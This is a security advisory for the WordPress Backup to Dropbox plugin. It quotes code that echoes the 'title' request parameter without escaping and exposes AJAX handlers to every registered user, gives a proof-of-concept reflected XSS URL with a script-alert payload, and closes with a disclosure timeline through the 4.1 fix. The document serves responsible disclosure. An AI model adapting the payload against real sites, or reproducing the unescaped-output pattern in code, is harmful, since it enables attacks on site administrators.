wpb2d-premium.php is visible on ?page=backup-to-dropbox-premium:
File: wordpress-backup-to-dropbox\wp-backup-to-dropbox.php
add_submenu_page('backup-to-dropbox', $text, $text, 'activate_plugins', 'backup-to-dropbox-premium', 'backup_to_dropbox_premium');
function backup_to_dropbox_premium()
{
wp_enqueue_script('jquery-ui-core');
wp_enqueue_script('jquery-ui-tabs');
$uri = rtrim(WP_PLUGIN_URL, '/') . '/wordpress-backup-to-dropbox';
include 'Views/wpb2d-premium.php';
}$_REQUEST['title'] is not escaped.
File: wordpress-backup-to-dropbox\Views\wpb2d-premium.php
if (isset($_REQUEST['title'])) {
add_settings_error('general', 'wpb2d_premium_success', sprintf(__('You have succesfully purchased %s.', 'wpbtd'), "<strong>{$_REQUEST['title']}</strong>"), 'updated');
}backup_to_dropbox_file_tree and backup_to_dropbox_progress is accessible for every registered user.
if (is_admin()) {
//WordPress filters and actions
add_action('wp_ajax_file_tree', 'backup_to_dropbox_file_tree');
add_action('wp_ajax_progress', 'backup_to_dropbox_progress');
if (defined('MULTISITE') && MULTISITE) {
add_action('network_admin_menu', 'backup_to_dropbox_admin_menu');
} else {
add_action('admin_menu', 'backup_to_dropbox_admin_menu');
}
}Proof of Concept
XSS will be visible for admin:
http://wordpress-install/wp-admin/admin.php?page=backup-to-dropbox-premium&title=<script>alert(String.fromCharCode(88,83,83));</script>Timeline
- 10-11-2014: Discovered
- 10-11-2014: Vendor notified
- 19-11-2014: Second notification
- 22-12-2014: Version 4.1 released, issue resolved
